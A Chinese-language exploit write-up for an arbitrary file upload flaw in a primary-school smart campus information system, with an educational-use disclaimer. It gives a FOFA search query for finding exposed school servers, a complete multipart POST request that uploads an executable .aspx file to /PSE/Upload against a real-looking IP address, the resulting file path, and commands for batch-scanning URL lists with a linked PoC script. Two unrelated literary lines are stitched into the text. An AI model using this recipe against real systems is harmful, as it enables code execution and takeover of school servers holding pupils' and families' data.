声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
漏洞描述
某小学智慧校园信息管理系统是新中新集团利用云服务技术,并借鉴“互联网+”模式,专为中小学校园打造的一套集学生校园安全、家校互动、校园金融以及校园一卡通为一体的基础教育信息化整体解决方案。该系统围绕基础教育信息化、智慧化建设,将线下业务和线上业务结合,为教育主管部门、校园管理者、教师、学生以及家长提供具有教务管理功能的平台化、移动化的应用系统。
某小学智慧校园信息管理系统 /PSE/Upload
接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
漏洞复现
1)信息收集
fofa:body="/Login/IndexMobi"&domain="edu"
山川同一色,浩若涉大荒。
构造数据包:
POST /PSE/Upload HTTP/1.1
Host: 111.20.198.254:8030
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Content-Type: multipart/form-data; boundary=230982304982309
Connection: close
Content-Length: 239
--230982304982309
Content-Disposition: form-data; name="file"; filename="Hello.aspx"
Content-Type: image/jpg
<%@Page Language="C#"%><%Response.Write("HelloWorldTest");System.IO.File.Delete(Request.PhysicalPath);%>
--230982304982309--
回显上传成功,访问一下上传的文件
/Upload/PrimarySchoolEnrollment/2601b03b-8da7-443a-9a9c-e18d2f2c5ac0.aspx
测试工具
https://github.com/ATonysan/poc-exp/blob/main/School_Upload_ArbiraryFileUpload.py
批量检测:
python School_Upload_ArbiraryFileUpload.py -f url.txt
单个url检测漏洞:
python School_Upload_ArbiraryFileUpload.py -u url
我不敢去,但必须去,有些事是必须要做的逃避不了